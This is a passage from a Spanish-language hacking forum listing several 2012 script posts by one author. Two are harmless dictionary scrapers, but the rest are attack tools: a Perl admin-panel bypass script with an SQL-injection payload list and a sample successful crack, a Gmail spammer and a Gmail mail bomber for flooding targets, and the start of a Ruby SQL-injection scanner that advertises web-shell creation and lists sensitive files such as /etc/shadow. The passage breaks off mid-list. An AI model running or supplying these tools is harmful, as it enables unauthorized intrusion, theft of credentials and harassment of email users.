|
281
|
Programación / Scripting / [Python] Diccionario Online 0.1
|
en: 19 Marzo 2012, 02:05 am
|
Un pequeño script en Python que hice para buscar una definicion a cualquier palabra que se ingrese. El codigo #!usr/bin/python #Diccionario Online 0.1 #Coded By Doddy H import urllib2,re,sys,HTMLParser def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def head(): print """ @@@@ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@@ @ @@ @@@ @@ @ @@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@ @ @@@ @ @ @@@@ @ @ @@@ Coded By Doddy H """ def copyright(): print "\n\n(C) Doddy Hackman 2012\n" raw_input() sys.exit(1) head() url = raw_input("\n\n[+] Palabra : ") try: code = toma("http://es.thefreedictionary.com/"+url) if (re.findall("<div class=runseg><b>1 <\/b> (.*?)[.:<]",code)): re = re.findall("<div class=runseg><b>1 <\/b> (.*?)[.:<]",code) re = re[0] htmlparser = HTMLParser.HTMLParser() re = htmlparser.unescape(re) if not re=="": print "\n\n[+] Definicion : "+re else: print "[-] No se encontro significado\n" except: print "[-] Error\n" copyright() # The End
|
|
|
282
|
Programación / Scripting / [Ruby] Diccionario Online 0.1
|
en: 19 Marzo 2012, 02:04 am
|
Un simple script en Ruby para buscar la definicion de cualquier palabra El codigo #!usr/bin/ruby #Diccionario Online 0.1 #Coded By Doddy H require "net/http" require "cgi" def head() print " @@@@ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@@ @ @@ @@@ @@ @ @@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@ @ @@@ @ @ @@@@ @ @ @@@ Coded By Doddy H " end def copyright() print "\n\n(C) Doddy Hackman 2012\n\n" exit(1) end def toma(web) return Net::HTTP.get_response(URI.parse(web)).body end head() print "\n[+] Palabra : " string = gets.chomp url = "http://es.thefreedictionary.com/"+string code = toma(url) if code=~/<div class=runseg><b>1 <\/b> (.*?)[.:<]/ text = CGI.unescapeHTML($1) if text == " " print "\n\n[-] Palabra no encontrada" else print "\n\n[+] Definicion : "+text end end copyright() #The End ?
|
|
|
283
|
Programación / Scripting / [Perl] ByPass Admin 0.1
|
en: 13 Marzo 2012, 18:50 pm
|
Acabo de terminar un programa que eh estado haciendo estos ultimos 3 dias , se trata de un script hecho en Perl para realizar los famosos y miticos bypass en los paneles de administracion , lo bueno es que parsea todos los formularios encontrados en la pagina marcada para que todo sea mas automatico. El programa depende de un archivo de texto llamado bypass.txt admin'-- 'or'1'='1 'or' ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a - ' or 'x'='x - ' or 'x'='x 'or'1 ou 'or''=' ' or 'x'='x admin' or 1==1 ' OR "=' 'or'1'='1
El codigo (formateado con perltidy) es #!usr/bin/perl #ByPass Admin 0.1 #Coded By Doddy H use LWP::UserAgent; use HTML::Form; my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); head(); start(); copyright(); sub start { print "\n\n[+] Admin : "; chomp( my $url = <STDIN> ); my $code = toma($url); my @testar = HTML::Form->parse( $code, "/" ); $count = 0; foreach my $test (@testar) { $count++; print "\n\n -- == Form $count == --\n\n"; if ( $test->attr(name) eq "" ) { print "[+] Name : No Found" . "\n"; } else { print "[+] Name : " . $test->attr(name ) . "\n"; } print "[+] Action : " . $test->action . "\n"; print "[+] Method : " . $test->method . "\n"; print "\n-- == Input == --\n\n"; @inputs = $test->inputs; foreach $in (@inputs) { print "\n[+] Type : " . $in->type . "\n"; print "[+] Name : " . $in->name . "\n"; print "[+] Value : " . $in->value . "\n"; } } print "\n\n[+] Form to crack : "; chomp( my $op = <stdin> ); chomp( my $aca = <stdin> ); print "\n[+] Options to check\n\n"; print "3 - Automatic\n\n"; chomp( my $op2 = <stdin> ); my @bypass = loadword(); if ( $op2 eq "1" ) { chomp( my $st = <stdin> ); print "\n\n[+] Cracking login....\n\n"; for my $by (@bypass) { my $code = load( $url, $code, $op, $aca, $by ); if ( $code =~ /$st/ig ) { cracked( $url, $by ); } } print "\n[+] Finished\n"; } if ( $op2 eq "2" ) { chomp( my $st = <stdin> ); print "\n\n[+] Cracking login....\n\n"; for my $by (@bypass) { my $code = load( $url, $code, $op, $aca, $by ); unless ( $code =~ /$st/ig ) { cracked( $url, $by ); } } print "\n[+] Finished\n"; } if ( $op2 eq "3" ) { print "\n\n[+] Cracking login....\n\n"; my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" ); for my $by (@bypass) { my $code = load( $url, $code, $op, $aca, $by ); unless ( $code eq $prueba_falsa ) { cracked( $url, $by ); } } print "\n[+] Finished\n"; } } sub load { my ( $url, $code, $op, $aca, $text ) = @_; $op--; my @probar = ( HTML::Form->parse( $code, "/" ) )[$op]; for my $testa (@probar) { if ( $testa->method eq "POST" ) { my @inputs = $testa->inputs; for my $in (@inputs) { if ( $in->type eq "submit" ) { if ( $in->name eq $aca ) { push( @botones_names, $in->name ); push( @botones_values, $in->value ); } } else { push( @ordenuno, $in->name, $text ); } } my @preuno = @ordenuno; push( @preuno, $botones_names[0], $botones_values[0] ); my $codeuno = $nave->post( $url, \@preuno )->content; } else { my $final = ""; my $orden = ""; my $partedos = ""; my @inputs = $testa->inputs; for my $testa (@inputs) { if ( $testa->name eq $aca ) { push( @botones_names, $testa->name ); push( @botones_values, $testa->value ); } else { $orden .= '' . $testa->name . '=' . $text . '&'; } } my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0]; my $final = $url . "?" . $orden . $partedos; $codedos = toma($final); } } } sub cracked { print "[+] Login Cracked\n\n"; print "[+] URL : $_[0]\n"; print "[+] Bypass : $_[1]\n"; savefile( "logs-bypass.txt", "[+] URL : $_[0]" ); savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" ); copyright(); } sub loadword { my $file = "bypass.txt"; if ( -f $file ) { open( FI , "bypass.txt" ); my @txts = <FI>; } else { print "\n\n[-] Wordlist not found\n\n"; copyright(); } } sub head { @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ @ @@ ); } sub copyright { print "\n\n(C) Doddy Hackman 2012\n\n"; <stdin>; } sub savefile { open( SAVE , ">>" . $_[0] ); } sub toma { return $nave->get( $_[0] )->content; } #The End ?
Un ejemplo de uso
@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ @ @@
[+] Admin : http://localhost/labs/bypass/primero.php
-- == Form 1 == --
[+] Name : No Found [+] Action : / [+] Method : POST
-- == Input == --
[+] Type : text [+] Name : usuario [+] Value :
[+] Type : password [+] Name : password [+] Value :
[+] Type : submit [+] Name : logeo [+] Value : Entrar
[+] Form to crack : 1
[+] Submit : logeo
[+] Options to check
1 - Positive 2 - Negative 3 - Automatic
[+] Option : 1
[+] String : exitoso
[+] Cracking login....
[+] Login Cracked
[+] URL : http://localhost/labs/bypass/primero.php [+] Bypass : 'or'1'='1
(C) Doddy Hackman 2012
|
|
|
284
|
Programación / Scripting / [Perl] DH Spammer 0.1
|
en: 1 Marzo 2012, 22:21 pm
|
Hola a todos , aca les traigo un programa que hice para mandar mails con las siguientes opciones. - Mensajes que permitan codigo HTML.
- Adjuntar archivos
- Mandar la cantidad que quieran
- Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)
Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta. Una imagen del programa El codigo (formateado con perltidy) es ........... #!usr/bin/perl #DH Spammer 0.1 #Coded By Doddy H #Dependencies #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod #Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html use Tk; use Tk::ROText; use Tk::FileSelect; use Email::Send::SMTP::Gmail; use Net::SMTP::SSL; use Cwd; if ( $^O eq 'MSWin32' ) { use Win32::Console; Win32::Console::Free(); } my $color_fondo = "black"; my $color_texto = "white"; my $ve = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $ve->geometry("920x560+20+20"); $ve->resizable( 0, 0 ); $ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012"); $d = $ve->Frame( -relief => "sunken", -bd => 1, -background => $color_fondo, -foreground => $color_texto ); my $ma = $d->Menubutton( -text => "Mails", -underline => 1, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->pack( -side => "left" ); my $op = $d->Menubutton( -text => "Options", -underline => 1, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->pack( -side => "left" ); my $ab = $d->Menubutton( -text => "About", -underline => 1, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->pack( -side => "left" ); my $ex = $d->Menubutton( -text => "Exit", -underline => 1, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->pack( -side => "left" ); $d->pack( -side => "top", -fill => "x" ); $ma->command( -label => "Add Mailist", -background => $color_fondo, -foreground => $color_texto, -command => \&addmailist ); $ma->command( -label => "Add Mail", -background => $color_fondo, -foreground => $color_texto, -command => \&addmail ); $ma->command( -label => "Clean List", -background => $color_fondo, -foreground => $color_texto, -command => \&delist ); $op->command( -label => "Spam Now", -background => $color_fondo, -foreground => $color_texto, -command => \&spamnow ); $op->command( -label => "Add Attachment", -background => $color_fondo, -foreground => $color_texto, -command => \&addfile ); $op->command( -label => "Clean All", -background => $color_fondo, -foreground => $color_texto, -command => \&clean ); $ab->command( -label => "About", -background => $color_fondo, -foreground => $color_texto, -command => \&about ); $ex->command( -label => "Exit", -background => $color_fondo, -foreground => $color_texto, -command => \&chali ); $ve->Label( -text => "Gmail Login", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 100, -y => 40 ); $ve->Label( -text => "Username : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 80 ); my $user = $ve->Entry( -width => 30, -text => 'lagartojuancho@gmail.com', -background => $color_fondo, -foreground => $color_texto )->place( -y => 83, -x => 85 ); $ve->Label( -text => "Password : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 120 ); my $pass = $ve->Entry( -show => "*", -width => 30, -text => 'Secret', -background => $color_fondo, -foreground => $color_texto )->place( -y => 123, -x => 85 ); $ve->Label( -text => "Message", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 160 ); $ve->Label( -text => "Number : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 210 ); my $number = $ve->Entry( -width => 5, -text => "1", -background => $color_fondo, -foreground => $color_texto )->place( -x => 75, -y => 212 ); $ve->Label( -text => "Attachment : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 240 ); my $fi = $ve->Entry( -text => 'None', -width => 30, -background => $color_fondo, -foreground => $color_texto )->place( -x => 90, -y => 242 ); $ve->Label( -text => "Subject : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 270 ); my $tema = $ve->Entry( -text => "Hi idiot", -width => 20, -background => $color_fondo, -foreground => $color_texto )->place( -x => 73, -y => 273 ); $ve->Label( -text => "Body", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 310 ); my $body = $ve->Scrolled( "Text", -width => 30, -height => 12, -background => $color_fondo, -foreground => $color_texto, -scrollbars => "e" )->place( -x => 45, -y => 350 ); $body->insert( "end", "Welcome to the hell" ); $ve->Label( -text => "Mailist", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -y => 40, -x => 400 ); my $mailist = $ve->Listbox( -height => 31, -width => 33, -background => $color_fondo, -foreground => $color_texto )->place( -y => 85, -x => 330 ); $ve->Label( -text => "Console", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -y => 40, -x => 685 ); my $console = $ve->Scrolled( "ROText", -width => 40, -height => 31, -background => $color_fondo, -foreground => $color_texto, -scrollbars => "e" )->place( -x => 580, -y => 84 ); MainLoop; sub addmailist { my $adda = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $adda->geometry("400x90+20+20"); $adda->resizable( 0, 0 ); $adda->title("Add Mailist"); $adda->Label( -text => "Mailist : ", -background => $color_fondo, -foreground => $color_texto, -font => "Impact1" )->place( -x => 10, -y => 30 ); my $en = $adda->Entry( -background => $color_fondo, -foreground => $color_texto, -width => 33 )->place( -y => 33, -x => 75 ); $adda->Button( -text => "Browse", -background => $color_fondo, -foreground => $color_texto, -width => 7, -activebackground => $color_texto, -command => \&brona )->place( -y => 33, -x => 285 ); $adda->Button( -text => "Load", -background => $color_fondo, -foreground => $color_texto, -width => 7, -activebackground => $color_texto, -command => \&bronaxa )->place( -y => 33, -x => 340 ); sub brona { $browse = $adda->FileSelect( -directory => getcwd() ); my $file = $browse->Show; $en->configure( -text => $file ); } sub bronaxa { @words = <FILE>; for (@words) { $mailist->insert( "end", $_ ); } } } sub addfile { my $addax = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $addax->geometry("390x90+20+20"); $addax->resizable( 0, 0 ); $addax->title("Add File"); $addax->Label( -text => "File : ", -background => $color_fondo, -foreground => $color_texto, -font => "Impact1" )->place( -x => 10, -y => 30 ); my $enaf = $addax->Entry( -background => $color_fondo, -foreground => $color_texto, -width => 33 )->place( -y => 33, -x => 55 ); $addax->Button( -text => "Browse", -background => $color_fondo, -foreground => $color_texto, -width => 7, -activebackground => $color_texto, -command => \&bronax )->place( -y => 33, -x => 265 ); $addax->Button( -text => "Load", -background => $color_fondo, -foreground => $color_texto, -width => 7, -activebackground => $color_texto, -command => \&bronaxx )->place( -y => 33, -x => 320 ); sub bronax { $browse = $addax->FileSelect( -directory => getcwd() ); my $filea = $browse->Show; $enaf->configure( -text => $filea ); } sub bronaxx { $fi->configure( -text => $enaf->get ); } } sub addmail { my $add = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $add->geometry("350x90+20+20"); $add->resizable( 0, 0 ); $add->title("Add Mail"); $add->Label( -text => "Mail : ", -background => $color_fondo, -foreground => $color_texto, -font => "Impact1" )->place( -x => 10, -y => 30 ); my $ew = $add->Entry( -background => $color_fondo, -foreground => $color_texto, -width => 33 )->place( -y => 33, -x => 60 ); $add->Button( -text => "Add", -background => $color_fondo, -activebackground => $color_texto, -foreground => $color_texto, -width => 7, -command => \&addnow )->place( -y => 33, -x => 275 ); sub addnow { $mailist->insert( "end", $ew->get ); } } sub delist { $mailist->delete( 0.0, "end" ); } sub spamnow { $console->delete( 0.1, "end" ); my $control = "0"; my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 ); if ( $msg->auth( $user->get, $pass->get ) ) { $control = "1"; } else { $control = "0"; } $msg->quit(); if ($control) { $console->insert( "end", "[+] Starting the Party\n\n" ); my @mails = $mailist->get( "0.0", "end" ); for my $mail (@mails) { $ve->update; $console->insert( "end", "[+] Mail : $mail\n" ); my $text = $body->get( "1.0", "end" ); if ( $fi->get eq "None" ) { singlemail( $user->get, $pass->get, $mail, $tema->get, $text, $number->get ); } else { singlemailwithfile( $user->get, $pass->get, $mail, $tema->get, $text, $fi->get, $number->get ); } } $console->insert( "end", "\n\n[+] Finished" ); } else { $console->insert( "end", "[-] Bad Login\n" ); } } sub singlemail { my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_; for ( 1 .. $cantidad ) { my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 ); $msg->auth( $user, $password ); $msg->mail( $user . "\n" ); $msg->to( $target . "\n" ); $msg->data(); $msg->datasend( "From: " . $user . "\n" ); $msg->datasend( "To: " . $target . "\n" ); $msg->datasend( "Subject: " . $asunto . "\n" ); $msg->datasend("Content-Type: text/html \n"); $msg->datasend("\n"); $msg->datasend( $mensaje . "\n" ); $msg->dataend(); $msg->quit(); } } sub singlemailwithfile { my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_; my $mail = Email::Send::SMTP::Gmail->new( -smtp => "gmail.com", -login => $user, -pass => $password ); for my $number ( 1 .. $cantidad ) { $mail->send( -to => $target, -subject => $asunto, -body => $mensaje, -attachments => $file ); } $mail->bye; } sub clean { $user->configure( -text => " " ); $pass->configure( -text => " " ); $number->configure( -text => " " ); $fi->configure( -text => "None" ); $tema->configure( -text => " " ); $body->delete( 0.1, "end" ); $mailist->delete( 0.0, "end" ); $console->delete( 0.1, "end" ); } sub about { $about = MainWindow->new( -background => "black" ); $about->title("About"); $about->geometry("300x110"); $about->resizable( 0, 0 ); $about->Label( -background => "black", -foreground => "white" )->pack(); $about->Label( -text => "Contact : lepuke[at]hotmail[com]", -font => "Impact", -background => "black", -foreground => "white" )->pack(); $about->Label( -text => "Web : doddyhackman.webcindario.com", -font => "Impact", -background => "black", -foreground => "white" )->pack(); $about->Label( -text => "Blog : doddy-hackman.blogspot.com", -font => "Impact", -background => "black", -foreground => "white" )->pack(); } #The End ?
|
|
|
285
|
Programación / Scripting / [Perl] Gmail Bomber 0.3
|
en: 23 Febrero 2012, 17:39 pm
|
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta Y mi casilla quedo asi El codigo del programa (formateado con perltidy) es #!usr/bin/perl #Gmail Bomber 0.2 #Dependencies #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod use Tk; use Win32; use Email::Send::SMTP::Gmail; if ( $^O eq 'MSWin32' ) { use Win32::Console; Win32::Console::Free(); } my $color_fondo = "black"; my $color_texto = "green"; my $ve = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $ve->geometry("300x600+20+20"); $ve->resizable( 0, 0 ); $ve->title("Gmail Bomber 0.2"); $ve->Label( -text => "Login", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 30 ); $ve->Label( -text => "Username : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 80 ); my $user = $ve->Entry( -width => 30, -text => 'lagartojuancho@gmail.com', -background => $color_fondo, -foreground => $color_texto )->place( -y => 83, -x => 85 ); $ve->Label( -text => "Password : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 120 ); my $pass = $ve->Entry( -show => "*", -width => 30, -text => 'Secret', -background => $color_fondo, -foreground => $color_texto )->place( -y => 123, -x => 85 ); $ve->Label( -text => "Message", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 160 ); $ve->Label( -text => "Number : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 210 ); my $number = $ve->Entry( -width => 5, -text => "20", -background => $color_fondo, -foreground => $color_texto )->place( -x => 75, -y => 212 ); $ve->Label( -text => "Target : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 240 ); my $to = $ve->Entry( -text => 'idiot@gmail.com', -width => 30, -background => $color_fondo, -foreground => $color_texto )->place( -x => 73, -y => 242 ); $ve->Label( -text => "Subject : ", -background => $color_fondo, -foreground => $color_texto )->place( -x => 20, -y => 270 ); my $tema = $ve->Entry( -text => "Hi idiot", -width => 20, -background => $color_fondo, -foreground => $color_texto )->place( -x => 73, -y => 273 ); $ve->Label( -text => "Body", -font => "Impact3", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 310 ); my $body = $ve->Text( -width => 30, -height => 12, -background => $color_fondo, -foreground => $color_texto )->place( -x => 45, -y => 350 ); $body->insert( "end", "Welcome to the hell" ); $ve->Button( -text => "Send", -width => 10, -command => \&start, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->place( -x => 43, -y => 550 ); $ve->Button( -text => "About", -width => 10, -command => \&about, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->place( -x => 117, -y => 550 ); $ve->Button( -text => "Exit", -width => 10, -command => [ $ve => "destroy" ], -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->place( -x => 190, -y => 550 ); MainLoop; sub start { $text = $body->get( "1.0", "end" ); if ( my $mail = Email::Send::SMTP::Gmail->new( -smtp => "gmail.com", -login => $user->get, -pass => $pass->get ) ) { for my $number ( 1 .. $number->get ) { $ve->update; $mail->send( -to => $to->get, -subject => $tema->get, -body => $text ); } Win32::MsgBox( "Send", 0, "Mails Send" ); $mail->bye; } else { Win32::MsgBox( "Error in the login", 0, "Error" ); } } sub about { my $text = "This program was written by Doddy H for the Tournament of Programming Perl to forum HackxCrack"; Win32::MsgBox( $text, 0, "About" ); } #The End ?
|
|
|
286
|
Programación / Scripting / [Ruby] k0bra 0.3
|
en: 16 Febrero 2012, 18:16 pm
|
Un simple scanner SQLI con las siguientes funciones - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
#!usr/bin/ruby #K0bra 0.3 #Coded By Doddy H require "net/http" $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0